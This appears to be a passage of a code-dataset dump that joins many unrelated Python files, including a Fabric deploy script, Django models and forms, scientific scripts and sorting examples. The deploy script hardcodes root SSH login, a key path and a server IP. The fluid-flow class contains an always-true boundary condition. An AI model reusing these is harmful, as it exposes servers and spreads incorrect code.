服务器登录用户名:\nenv.user = \"root\"\nenv.key_filename = \"D:\\\\Network\\\\id_rsa\"\n\n# 服务器地址,可以有多个,依次部署:\nenv.hosts = [\"202.5.21.246\"]\n\n_TAR_FILE = \"dist-kaguyahime.tar.gz\"\n\n\ndef build():\n excludes = [\"__pycache__\", \"static/node_modules\"]\n local(\"del dist\\\\%s\" % _TAR_FILE)\n with lcd(os.path.join(os.path.abspath(\".\"), \"www\")):\n cmd = [\"tar\", \"--dereference\", \"-czvf\", \"../dist/%s\" % _TAR_FILE]\n cmd.extend([\"--exclude=%s\" % ex for ex in excludes])\n cmd.extend([\".\"])\n local(\" \".join(cmd))\n\n\n_REMOTE_TMP_TAR = \"/home/www/kaguyahime/%s\" % _TAR_FILE\n_REMOTE_BASE_DIR = \"/home/www/kaguyahime/\"\n\n\ndef deploy():\n print(os.getcwd())\n newdir = \"www-%s\" % datetime.now().strftime(\"%y-%m-%d_%H.%M.%S\")\n run(\"mkdir /home/www/kaguyahime/conf -p\")\n run(\"mkdir /home/www/kaguyahime/log -p\")\n for f in glob.glob(\"conf/*\"):\n put(f, _REMOTE_BASE_DIR + f.replace(\"\\\\\", \"/\"))\n # 删除已有的tar文件:\n run(\"rm -f %s\" % _REMOTE_TMP_TAR)\n # 上传新的tar文件:\n put(\"dist/%s\" % _TAR_FILE, _REMOTE_TMP_TAR)\n # 创建新目录:\n with cd(_REMOTE_BASE_DIR):\n run(\"mkdir %s\" % newdir)\n # 解压到新目录:\n with cd(\"%s%s\" % (_REMOTE_BASE_DIR, newdir)):\n run(\"tar -xzvf %s\" % _REMOTE_TMP_TAR)\n # 重置软链接:\n with cd(_REMOTE_BASE_DIR):\n run(\"rm -rf www\")\n run(\"ln -s %s www\" % newdir)\n # 重启Python服务和nginx服务器:\n with settings(warn_only=True):\n run(\"supervisorctl stop kaguyahime\")\n run(\"supervisorctl start kaguyahime\")\n run(\"nginx -s reload\")\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385073335","text":"import pytest\nfrom validr import Invalid, 
SchemaError, SchemaParser\n\n\n@pytest.mark.parametrize('schema,value', [\n (\n {'$self@user_name': 'User'},\n {'name': 'kk'}\n ),\n (\n {'$self@user_name@user_age': 'User'},\n {'name': 'kk', 'age': 1}\n ),\n (\n {'$self@user_name': 'User', 'userid?int': 'ID'},\n {'name': 'kk', 'userid': 0}\n )\n])\ndef test_basic(schema, value):\n sp = SchemaParser(shared={\n 'user_name': {'name?str': 'name'},\n 'user_age': {'age?int': 'age'},\n })\n f = sp.parse(schema)\n assert f(value) == value\n\n\n@pytest.mark.parametrize('schema', [\n {'$self@user_name&optional': 'User'},\n {'$self@user_name&optional': 'User', 'userid?int': 'ID'},\n {'$self@user_name@user_age&optional': 'User'},\n])\ndef test_optional(schema):\n sp = SchemaParser(shared={\n 'user_name': {'name?str': 'name'},\n 'user_age': {'age?int': 'age'},\n })\n f = sp.parse(schema)\n assert f(None) is None\n\n\ndef test_shared_not_found():\n sp = SchemaParser(shared={'user': {'userid?int': 'userid'}})\n with pytest.raises(SchemaError):\n sp.parse({'$self@unknown@user': 'desc'})\n\n\ndef test_merge_non_dict_value_error():\n sp = SchemaParser(shared={\n 'a': 'int',\n 'b': {'k?str': 'v'}\n })\n with pytest.raises(SchemaError) as exinfo:\n sp.parse({'key': {'$self@a@b': 'invalid merges'}})\n assert exinfo.value.position == 'key'\n assert '@a' in exinfo.value.message\n\n\ndef test_required():\n sp = SchemaParser(shared={'a': {'x?int': 'x'}, 'b': {'y?int': 'y'}})\n f = sp.parse({'$self@a@b': 'required'})\n assert f({'x': 1, 'y': 2}) == {'x': 1, 'y': 2}\n with pytest.raises(Invalid) as exinfo:\n f(None)\n assert 'required' in exinfo.value.message\n\n\n@pytest.mark.parametrize('value,expect', [\n (None, ''),\n ({'name': 'kk'}, 'age'),\n ({'age': 1}, 'name'),\n ({'name': 'kk', 'age': 'xxx'}, 'age'),\n])\ndef test_error_position(value, expect):\n sp = SchemaParser(shared={\n 'user_name': {'name?str': 'name'},\n 'user_age': {'age?int': 'age'},\n })\n f = sp.parse({'$self@user_name@user_age': 'User'})\n with pytest.raises(Invalid) as exinfo:\n f(value)\n assert exinfo.value.position == expect\n","sub_path":"tests/test_merge.py","file_name":"test_merge.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"645221279","text":"import numpy as np\n\n\n\"\"\"Eventually, this module should be able to set up a 3D transient fluid flow problem for a rectangular\nduct for the solver inputs. Currently, only a 2D advection-diffusion problem is to be set up to get\nthings rolling. The initial conditions, boundary conditions, and fluid properties will be established here\"\"\"\n\n\nclass FiniteVolume(object):\n \"\"\"A finite volume is a defined space in which energy and mass can enter and leave via several processes including\n diffusion and advection. 
In this class, the finite volume is a quadrahedron.\n\n Attributes\n __________\n\n size : dx, dy, and dz as length, height, and depth of the quadrahedron in [m]\n time_step : dt in [s]\n position : x, y, and z location in [m]\n boundary : 'top', 'bottom', 'left', 'right', 'front', 'back' of domain where up to 3 may be chosen\n velocity_estimated : u, v, and w velocities in [m/s]\n velocity : u, v, and w velocities in [m/s]\n pressure_estimated : p pressure in [Pa]\n pressure : p pressure in [Pa]\n temperature : temp\n density : fluid density in [kg/m^3]\n viscosity : in [kg/(m*s)]\n conductivity : fluid thermal conductivity [W/(m*K)]\n \"\"\"\n\n def __init__(self, size, time_step, position, boundary, velocity_estimated, velocity, pressure_estimated, pressure,\n temperature, density, viscosity, conductivity):\n\n self.size = size\n self.time_step = time_step\n self.position = position\n self.boundary = boundary\n self.velocity_estimated = velocity_estimated\n self.velocity = velocity\n self.pressure_estimated = pressure_estimated\n self.pressure = pressure\n self.temperature = temperature\n self.density = density\n self.viscosity = viscosity\n self.conductivity = conductivity\n\n def get_momentum_coefficients(self):\n \"\"\"Calculates the time coefficient for all the momentum equations at the current time step and the a\n coefficients in the x, y, and z directions. The coefficients are dependent on the reference, being the relative\n location of an adjacent node. Currently, the generalized convection-diffusion scheme is used from Chapter 8 of\n \"Computational Methods for Heat and Mass Transfer\" by Pradip Majumdar with the option for adding 5 different\n approximation schemes. The Hybrid scheme is selected for now.\"\"\"\n\n a_m = self.density*self.size['dx']*self.size['dy']*self.size['dz']/self.time_step\n\n pe_i = self.density*self.velocity['u']*self.size['dx']/self.viscosity\n a_pe_i = np.max(np.array([0, 1 - (np.abs(pe_i)/2)]))\n a_i_base = (self.viscosity / self.size['dx'])*a_pe_i\n a_i_sup = self.density*self.velocity['u']\n\n pe_j = self.density*self.velocity['v']*self.size['dy']/self.viscosity\n a_pe_j = np.max(np.array([0, 1 - (np.abs(pe_j)/2)]))\n a_j_base = (self.viscosity / self.size['dy'])*a_pe_j\n a_j_sup = self.density*self.velocity['v']\n\n pe_k = self.density*self.velocity['w']*self.size['dz']/self.viscosity\n a_pe_k = np.max(np.array([0, 1 - (np.abs(pe_k)/2)]))\n a_k_base = (self.viscosity / self.size['dz'])*a_pe_k\n a_k_sup = self.density*self.velocity['w']\n\n return a_m, [a_i_base, a_j_base, a_k_base], [a_i_sup, a_j_sup, a_k_sup]\n\n def set_boundary_values(self, p_inlet, p_outlet):\n \"\"\"Depending on the boundary of the finite volume, the boundary conditions for fluid flow will either be a known\n pressure or a velocity of zero in all directions\"\"\"\n\n if 'top' or 'bottom' or 'front' or 'back' in self.boundary:\n self.velocity = {'u': 0, 'v': 0, 'w': 0}\n\n if 'left' in self.boundary:\n self.pressure = p_inlet\n\n if 'right' in self.boundary:\n self.pressure = p_outlet\n\n\ndef initial_conditions(velocity, grid):\n \"\"\"Returns the velocity distribution as a numpy array at t = 0\n For 2D, the velocity input could be an integer or float if the velocity is the same along the\n entire channel. 
It could also be a function of x and y in the channel\"\"\"\n\n em1 = 'Initial velocity should be positive'\n em2 = 'Velocity must be scalar or function of x and y coordinates and grid must be numpy array'\n\n try:\n v = velocity(grid)\n if np.amin(v) < 0:\n return em1\n else:\n return v\n except TypeError:\n try:\n v = velocity*np.ones(np.shape(grid))\n if np.amin(v) < 0:\n return em1\n else:\n return v\n except TypeError:\n return em2\n","sub_path":"flowdist/fluidmechanics.py","file_name":"fluidmechanics.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29084984","text":"#!/usr/bin/env python\n# -*- coding: ascii -*-\n###############################################################################\n# Copyright (c) 2010, Penny Arcade, Inc. / Erik Karulf(erik@penny-arcade.com) #\n# #\n# Permission to use, copy, modify, and/or distribute this software for any #\n# purpose with or without fee is hereby granted, provided that the above #\n# copyright notice and this permission notice appear in all copies. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES #\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR #\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES #\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN #\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF #\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. #\n###############################################################################\n\nimport datetime\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nclass GlobalSessionManager(models.Manager):\n def active(self):\n return self.get_query_set().filter(expire_date__gt=datetime.datetime.utcnow())\n\nclass GlobalSession(models.Model):\n \"\"\"\n Global Session Table\n\n Read-only except to sso-server\n \"\"\"\n key = models.CharField(_('session key'), max_length=44, primary_key=True)\n user = models.ForeignKey(User, verbose_name=_('user'))\n expire_date = models.DateTimeField(_('expire date'), help_text=\"expiration timestamp (UTC)\")\n objects = GlobalSessionManager()\n \n class Meta:\n db_table = 'sso_session'\n verbose_name = _('global session')\n verbose_name_plural = _('global sessions')\n\nimport pa.sso.signals","sub_path":"src/pa/sso/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90130831","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:hua\nimport numpy as np\nfrom scipy.stats import kstest, norm\nimport matplotlib.pyplot as plt\nls = [1,2,3,4,5,6,7,6,5,4,3,2,1]\nls = np.array(ls)\nls.sort()\nn = len(ls)\n\n# x中第一个为统计量,第二个为P值\nx=kstest(ls, 'norm')\nprint(x)\ny_list = [float(i) / n for i in range(1, n + 1)] # 求观察累积概率y_list\n\nx_list = [norm.ppf(ele) for ele in y_list] # 用累积概率求分位数值x_list\n\nplt.plot(x_list, y_list)\n\nplt.savefig(\"QQ正态分布.png\")","sub_path":"正态性检验/正态分布检验QQ图.py","file_name":"正态分布检验QQ图.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"647341561","text":"arr = [64, 25, 12, 22, 11]\n\nfor i in range(0, len(arr)):\n index = i\n\n 
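# selection sort: scan the unsorted tail arr[i+1:] for the smallest\n    # remaining element, then swap it into slot i; this costs O(n^2)\n    # comparisons but only O(n) swaps\n    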
for j in range(i+1, len(arr)):\n if arr[index] > arr[j]:\n index = j\n\n arr[i], arr[index] = arr[index], arr[i]\n\nprint('Selection Sort')\nprint(arr)\nprint('')\n\narr = [64, 25, 12, 22, 11]\n\nfor i in range(0, len(arr)-1):\n for j in range(0, len(arr)-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\nprint('Bubble Sort')\nprint(arr)\nprint('')\n\narr = [64, 25, 12, 22, 11]\n\nfor i in range(1, len(arr)):\n key = arr[i]\n j = i -1\n\n while(j >= 0 and key < arr[j]):\n arr[j+1] = arr[j]\n j -= 1\n\n arr[j+1] = key\n\nprint('Insertion Sort')\nprint(arr)\nprint('')","sub_path":"basicSorts.py","file_name":"basicSorts.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"619007108","text":"#get the count of each genre. remeber, movies can have multiple genres\n#is there a primary genre? it seems like they're just listed alphabetically\nimport csv\n\nf = open('/Users/martinvazquez/Spring2020/DSC_341/project/dataSets/movieDBGrossInclMV.csv')\nlines = f.readlines()\nf.close()\n\nlst = []\nd = {}\n\n#get a gigantic list of every single word thats used in genres (even if its duplicated)\nfor line in lines[1:]: #removes the 1st row where all of the 'values' are just the header\n line = line.strip().strip('\"')\n line = line.split(',')\n line = line[1:]\n gross = line[9]\n print(gross)\n genres = line[10].strip('\"')\n genres = genres.split('|')\n #print(genres)\n lst.extend(genres)\n\n\nfor i in lst: #remove the duplicates, and do a count\n if i not in d:\n d[i] = 1\n else:\n d[i] +=1\n\n'''with open('genres.csv', mode='w') as csv_file:\n fieldnames = ['genre', 'count']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n writer.writeheader()\n for key in d:\n writer.writerow({'genre':key, 'count':d[key]})'''\n \n","sub_path":"333 Code/genre.py","file_name":"genre.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353730259","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Mordred and Morgan \n\n# In[2]:\n\n\n# Computing mordred and morgan features and building a model from these features\n\n\n# In[22]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport Utils as model_helpers\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\n\n# Computing Features\n\n# In[4]:\n\n\nhalf_enantiomer_data = pd.read_csv(\"half_enantiomer_data.csv\")\n\n\n# In[5]:\n\n\n# Remove line separaters\nhalf_enantiomer_data[\"SMILES String\"] = half_enantiomer_data[\"SMILES String\"].apply(lambda x : x.replace(\"\\\\n\", \"\") and x.replace(\"\\\\r\", \"\"))\nhalf_enantiomer_data[\"SMILES String\"] = half_enantiomer_data[\"SMILES String\"].apply(lambda x : x.replace(\"\\\\n\", \"\"))\n\n\n# In[6]:\n\n\n# Calculate the mordred features\nmordred_data = model_helpers.calculate_features(half_enantiomer_data, \"mordred\")\n\n\n# In[7]:\n\n\n# Calculate the morgan features\nmorgan_data = model_helpers.calculate_features(half_enantiomer_data, \"morgan\")\n\n\n# In[8]:\n\n\n#zero_var_cols = [mordred_data[col] for col in mordred_data.iloc[:,11:] if (mordred_data[col].var() > 0) == True]\n#mordred_data.drop(columns)\n\n\n# In[9]:\n\n\n# Dataframe with molecules that have mordred and morgan features computed\ncommon_index = mordred_data.index.intersection(morgan_data.index)\nmordred_data = mordred_data.loc[common_index]\nmorgan_data = 
morgan_data.loc[common_index]\n\n\n# In[10]:\n\n\n# Reset index\nmordred_data.set_index('Molecule Name').head().iloc[:, 10:];\nmorgan_data.set_index('Molecule Name').head().iloc[:, 10:];\n\n\n# In[11]:\n\n\n# Data frame that has both the mordred and morgan features\nboth = mordred_data.join(morgan_data.iloc[:,10:], how=\"inner\", rsuffix='morg_')\nboth.head()\n\n\n# In[12]:\n\n\n#Need to drop var columns\nprint(both.var().max())\nprint(both.var().min())\n\n\n# In[13]:\n\n\n# Gets all Mordred or Mogan features that have numeric values and not Null values\n# Joins the final mordred and morgan features \nfinite_mordred = model_helpers.finite_features(mordred_data)\nfinite_morgan = model_helpers.finite_features(morgan_data)\nboth_features = finite_mordred | finite_morgan\n\n\n# Model\n\n# In[21]:\n\n\n# Illustrate the magnitude differences across enantiomeric pairs in the dataset\nmodel_helpers.fold_difference_of_enantiomers(half_enantiomer_data)\n\n\n# In[15]:\n\n\n# Gets the appropriate parameter values for mordred model\n# Gets the valid features (not null values) from feature data frame and the log_abs values from the feature dataframe\nX_morded = mordred_data[finite_mordred]\ny = mordred_data['log_abs']\nX_morded = X_morded[y < 10]\ny_mordred = y[y < 10]\nXn_mordred = pd.DataFrame(StandardScaler().fit_transform(X_morded), index=X_morded.index, columns=X_morded.columns)\n\n\n# In[16]:\n\n\n# Gets the appropriate parameter values for Morgan model\n# Gets the valid features (not null values) from feature data frame and the log_abs values from the feature dataframe\nx_morgan = morgan_data[finite_morgan]\ny_morgan = morgan_data[\"log_abs\"]\nx_morgan = x_morgan[y_morgan < 10]\ny_morgan = y_morgan[y_morgan < 10]\nXn_morgan = pd.DataFrame(StandardScaler().fit_transform(x_morgan), index=x_morgan.index, columns=x_morgan.columns)\n\n\n# In[25]:\n\n\n# Model for Morgan data\nmodel_helpers.create_model(Xn_morgan, y_morgan)\n\n\n# In[26]:\n\n\nmodel_helpers.cross_val(Xn_morgan, y_morgan)\n\n\n# In[24]:\n\n\n# Model for Mordred data\nmodel_helpers.create_model(Xn_mordred, y_mordred)\n\n\n# In[23]:\n\n\nmodel_helpers.cross_val(Xn_mordred, y_mordred)\n\n","sub_path":"docs/_build/jupyter_execute/MordredAndMorgan.py","file_name":"MordredAndMorgan.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"2223339","text":"import os, sys\n\nfiles = [\n \"bgruven/bufrgruven/stations/gfs3_bufrstations.txt\",\n \"bgruven/bufrgruven/stations/nam_bufrstations.txt\",\n \"bgruven/bufrgruven/stations/rap_bufrstations.txt\",\n]\n\nd = {}\nfor f in files:\n model = f.split(\"/\")[-1].split(\"_\")[0]\n d[model] = {}\n\n fh = open(f, \"r\")\n lines = fh.readlines()\n fh.close()\n\n for line in lines:\n # 000001 69.580 -140.180 YAJ 11 0 KOMAKUK YT 19 0 MAGS 9-95\n s = line.split()\n sNum = s[0]\n lat = s[1]\n lon = s[2]\n site = s[3].lower()\n d[model][site] = {\"sNum\": sNum, \"lat\": lat, \"lon\": lon}\n\n# echo \"\".$lat[$i].\",\".$lon[$i].\",\".$sites[$i].\",\".$ewrf_sites[$i].\",\".$gfs.\",\".$nam.\",\".$ruc.\",\".$sref.\"\\n\";\n\nl = []\nsites = []\newrf = \"---\"\nsref = \"---\"\nfor site in d[\"gfs3\"]:\n nam = \"---\"\n rap = \"---\"\n if site in d[\"nam\"].keys():\n nam = site\n if site in d[\"rap\"].keys():\n rap = site\n s = (\n d[\"gfs3\"][site][\"lat\"]\n + \",\"\n + d[\"gfs3\"][site][\"lon\"]\n + \",\"\n + site\n + \",---,\"\n + site\n + \",\"\n + nam\n + \",\"\n + rap\n + \",---\"\n )\n l.append(s)\n 
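# remember which station codes have been emitted so the nam/rap loops\n    # below only append stations missing from the gfs3 listing\n    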
sites.append(site)\n\nfor site in d[\"nam\"]:\n if site in sites:\n continue\n rap = \"---\"\n if site in d[\"rap\"].keys():\n rap = site\n s = (\n d[\"nam\"][site][\"lat\"]\n + \",\"\n + d[\"nam\"][site][\"lon\"]\n + \",\"\n + site\n + \",---,---,\"\n + site\n + \",\"\n + rap\n + \",---\"\n )\n l.append(s)\n sites.append(site)\n\nfor site in d[\"rap\"]:\n if site in sites:\n continue\n s = (\n d[\"rap\"][site][\"lat\"]\n + \",\"\n + d[\"rap\"][site][\"lon\"]\n + \",\"\n + site\n + \",---,---,---,\"\n + site\n + \",---\"\n )\n l.append(s)\n sites.append(site)\n\nfh = open(\"global_stations_new.txt\", \"w\")\nfh.write(\"\\n\".join(l))\nfh.close()\n","sub_path":"scripts/makeGlobalSiteListing.py","file_name":"makeGlobalSiteListing.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49055055","text":"import biom_features as bf\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport numpy as np\nimport cv2 as cv\nimport time\n\nPATH = os.getcwd()\n#methods = [\"Histogram\", \"DFT\", \"DCT\", \"Scale\", \"Gradient\"]\n\n\ndef feat_demonst(m, n, p, BIN, w, s):\n\n fig, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(ncols=3, nrows=2, figsize=(10, 8))\n images = [PATH + \"/ATT/\" + str(i) + \"_1.png\" for i in range(1, 41)]\n\n for image in images:\n img = np.float32(cv.imread(image, 0))\n scale_feat = bf.Scale(img, m, n) # return matrix of resized image\n dtf_feat = bf.DFT(img, p) # return matrix p*p? mot centred\n dct_feat = bf.DCT(img, p) # also\n hist_feat = bf.histogram(img, BIN) # list of distributon, hist and normallised hist\n grad_feat = bf.gradient(img, w, s)\n\n\n ax1.imshow(img, cmap='gray')\n ax1.set_title(\"Origin image (112*92)\")\n\n # resized imge\n ax2.imshow(scale_feat, cmap='gray')\n ax2.set_title(\"Scale, m=18, n=15\")\n\n dft_centred = np.fft.fftshift(dtf_feat)\n dft_centred = np.log(np.abs(dft_centred))\n ax3.cla()\n ax3.imshow(abs(dft_centred), cmap='gray')\n ax3.set_title(\"DFT, p=20\")\n\n # plt.subplot(234)\n ax4.imshow(dct_feat, cmap='gray')\n ax4.set_title(\"DCT, p=20\")\n\n # plt.subplot(235)\n b = hist_feat[1]\n edges = [i * BIN for i in range(1, len(b) + 1)]\n ax5.cla()\n ax5.bar(edges, b, width=int(BIN / 2))\n\n # plt.subplot(236)\n x_grad = range(len(grad_feat))\n ax6.cla()\n ax6.plot(x_grad, grad_feat)\n\n ax6.grid(True)\n\n # fig.canvas.draw()\n # fig.canvas.flush_events()\n\n plt.ion()\n plt.show()\n plt.pause(0.05)\n\n plt.close()\n","sub_path":"demonstrate_feature.py","file_name":"demonstrate_feature.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"635156536","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ServerDnsAliasAcquisition(Model):\n \"\"\"A server DNS alias acquisition request.\n\n :param old_server_dns_alias_id: The id of the server alias that will be\n acquired to point to this server instead.\n :type old_server_dns_alias_id: str\n \"\"\"\n\n _attribute_map = {\n 'old_server_dns_alias_id': {'key': 'oldServerDnsAliasId', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(ServerDnsAliasAcquisition, self).__init__(**kwargs)\n self.old_server_dns_alias_id = kwargs.get('old_server_dns_alias_id', None)\n","sub_path":"src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/models/server_dns_alias_acquisition.py","file_name":"server_dns_alias_acquisition.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79862208","text":"def slownie(liczba):\n nazwy = ['zero', 'jeden', 'dwa', 'trzy', 'cztery',\n 'pięć', 'sześć', 'siedem', 'osiem', 'dziewięć']\n x = str(liczba)\n cyfry = []\n for elem in x:\n cyfry.append(nazwy[int(elem)])\n\n return ','.join(cyfry)\n\n\nprint(slownie(2542))\n","sub_path":"02-ControlStructures/31-40/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257139914","text":"# -*- coding:utf-8 -*-\n# python main.py \"\"\nimport gspread\nimport sys\nfrom datas_get import sheet_get\nfrom data_parse import datas_parse\n\n#debug flag\ndebug = 0\n\ndef main(argvs):\n\tname = argvs[1]\n\tdate = argvs[2]\n\n\twsheet = sheet_get.worksheet_acquisition(0)\n\n\t# Sheetから列情報をlistで取得\n\tname_col_record, name_col_len = sheet_get.get_col(wsheet,2)\n\n\tif debug == 1:\n\t\tprint('[*] name_col_record:{}'.format(name_col_record))\n\n\ttarget_row_num = datas_parse.search_name(name_col_record,argvs[1],name_col_len) + 1\n\n\tif debug == 1:\n\t\tprint('[*] target_row_num:{}'.format(target_row_num))\n\n\t# Sheetから行情報をlistで取得\n\ttarget_row_record, target_row_len = sheet_get.get_row(wsheet,target_row_num)\n\thead_row_record, head_row_len = sheet_get.get_row(wsheet,1)\n\n\tif debug == 1:\n\t\tprint('[*] head_row_record:{}'.format(head_row_record))\n\t\tprint('[*] target_row_record :{}'.format(target_row_record))\n\n\t# hiduke wo list ka?\n\ttime = datas_parse.time_get(date, head_row_len, head_row_record, wsheet, target_row_num-1)\n\tif(time[0]==0):\n\t\tprint('[-]this day is bit Mtg')\n\t\tquit()\n\n\tif debug == 1:\n\t\tprint('[*] st:{}'.format(time[0]))\n\t\tprint('[*] en:{}'.format(time[1]))\n\t\tprint('[*] rest:{}'.format(time[2]))\n\n\n\n\n\nif __name__ == '__main__':\n\targvs = sys.argv\n\tmain(argvs)","sub_path":"OLD/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"148466580","text":"import wx\n\nclass MyApp(wx.App):\n def OnInit(self):\n f = wx.Frame(None, title=\"Hello World\")\n self.tc = wx.TextCtrl(f, style=wx.TE_MULTILINE|wx.HSCROLL)\n f.Show()\n return True\n \n def MacOpenFile(self, filename):\n # Code to load filename goes here. 
We'll just print the names.\n self.tc.AppendText(\"You requested to open: \\\"%s\\\"\\n\" % filename)\n\napp = MyApp()\napp.MainLoop()\n\n","sub_path":"tags/wxPy-2.9.3.1/wxPython/sandbox/test_appleevents.py","file_name":"test_appleevents.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"199400962","text":"from django import forms\nfrom .models import Search, Employee, Computer, WirelessDevice, IPPhone, Laptop, Printer, BarcodeScanner, BarcodeScannerCradle, Scanner, BiometricScanner\nfrom django.contrib.auth.models import User\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom functools import partial\n\nclass EmployeeForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Employee\n\t\tfields = ['last_name', 'first_name', 'location', 'department', 'employee_id', 'email',]\n\t\tlabels = {'last_name': 'Last Name (required)', 'first_name': 'First Name (required)', 'employee_id': 'Employee ID', 'email': 'E-mail'}\n\nclass LoginForm(forms.ModelForm):\n\tpassword = forms.CharField(widget = forms.PasswordInput())\n\t#Hide help text\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(LoginForm, self).__init__(*args, **kwargs)\n\t\tfor field in ['username', 'password']:\n\t\t\tself.fields[field].help_text = None\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['username', 'password',]\n\t\t\nclass SearchForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Search\n\t\tfields = [\"search_term\",]\n\t\tlabels = {'search_term': 'Enter any string to be searched',}\n\t\t\nclass ComputerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Computer\n\t\tfields = ['pc_manufacturer', 'pc_model', 'pc_host_name', 'pc_service_tag', 'pc_asset_tag', 'pc_owner',]\n\t\tlabels = {'pc_manufacturer': 'PC Manufacturer', 'pc_model': 'PC Model', 'pc_host_name': 'PC Host Name', 'pc_service_tag': 'PC Serial Num/Service Tag', 'pc_asset_tag': 'PC Asset Tag', 'pc_owner': 'PC Owner',}\n\nclass WirelessDeviceForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = WirelessDevice\n\t\tfields = ['wd_type', 'wd_manufacturer', 'wd_model', 'wd_number', 'wd_serial_number', 'wd_meid', 'wd_carrier', 'wd_asset_tag', 'wd_date_deployed', 'wd_date_returned', ]\n\t\tlabels = {'wd_type': 'WD Type', 'wd_manufacturer': 'WD Manufacturer', 'wd_model': 'WD Model', 'wd_number': 'WD Number', 'wd_serial_number': 'WD Serial Number', 'wd_meid': 'MEID', 'wd_carrier': 'WD Carrier', 'wd_asset_tag': 'WD Asset Tag', 'wd_date_deployed': 'WD Deploy Date', 'wd_date_returned': 'WD Return Date',}\t\n\t\t#Add widget for jQuery datepicker\n\t\twidgets = {\n\t\t\t'wd_date_deployed': forms.DateInput(attrs = {'class': 'datepicker'}),\n 'wd_date_returned': forms.DateInput(attrs = {'class': 'datepicker'}),\n\t\t}\n\nclass IPPhoneForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = IPPhone\n\t\tfields = ['phone_manufacturer', 'phone_model','phone_number', 'phone_serial_number', 'phone_mac', 'phone_asset_tag', ]\n\t\tlabels = {'phone_manufacturer': 'Phone Manufacturer', 'phone_model': 'Phone Model','phone_number': 'Phone Number', 'phone_serial_number': 'Phone Serial Number', 'phone_mac': 'Phone MAC', 'phone_asset_tag': 'Phone Asset Tag',}\n\t\t\nclass LaptopForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Laptop\n\t\tfields = ['laptop_manufacturer', 'laptop_model', 'laptop_host_name', 'laptop_service_tag', 'laptop_asset_tag', 'laptop_owner', ]\n\t\tlabels = {'laptop_manufacturer': 'Laptop Manufacturer', 'laptop_model': 'Laptop Model', 'laptop_host_name': 'Laptop Host Name', 
